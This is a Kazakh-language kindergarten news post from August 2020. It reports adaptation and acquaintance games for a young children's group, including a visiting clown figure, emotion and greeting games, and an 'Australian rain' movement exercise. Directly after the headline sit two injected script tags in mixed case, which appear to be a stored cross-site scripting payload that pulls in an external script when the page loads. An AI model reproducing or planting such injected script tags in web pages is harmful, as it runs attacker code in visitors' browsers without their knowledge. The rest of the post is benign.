Кіші Гүлдер тобының балаларымен «Кел танысайық» атты ойындар мен жаттығулар өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.08.2020

 Ойынның мақсаты балабақшаға жаңадан келіп түскен балалардың бейімделуін жеңілдету, топтағы балалармен танысу және ойын арқылы балалардың көңіл – күйлерін көтеру . Сондай – ақ құрдастарымен  қарым-қатынасты қалыптастыру, бірлесіп ойнауды дамыту.

Балалармен танысу барысында қонаққа  Күлдіргіш  келіп, балалармен ойнап, нәтижесінде   бейімделуі төмен балалардың  көңіл – күйлері көтерілді.

Әрі қарай балалар  «Менің денемдегі эмоциялар» , «Сәлемдесу», «Дос іздеймін»  атты ойын – жаттығуларды  белсенді ойнады.

Ойын соңында балалармен « Австралиялық жаңбыр» атты тренинг өткізілді.

Ортада балалар шеңбер бойымен тұрып, Австралиялық жаңбырдың қандай екенін нұсқау бойынша қимыл – қозғалыстарды  қайталап, жақсы әуенмен би қимыл қозғалыстарын жасады.

Тренинг «Қошемет» жаттығуымен аяқталып, балалар дәл бүгінгі күні бір – бірін біліп, биікке көтеріліп, ортамызға жағымды жақтарымен көрінуге ұмтылып, жақсы қасиеттерімен  көрінуге тырысты.

 

 

 

Просмотров: 347


Пікір қосу



Деректерді қолтаңбаға қосу
Текст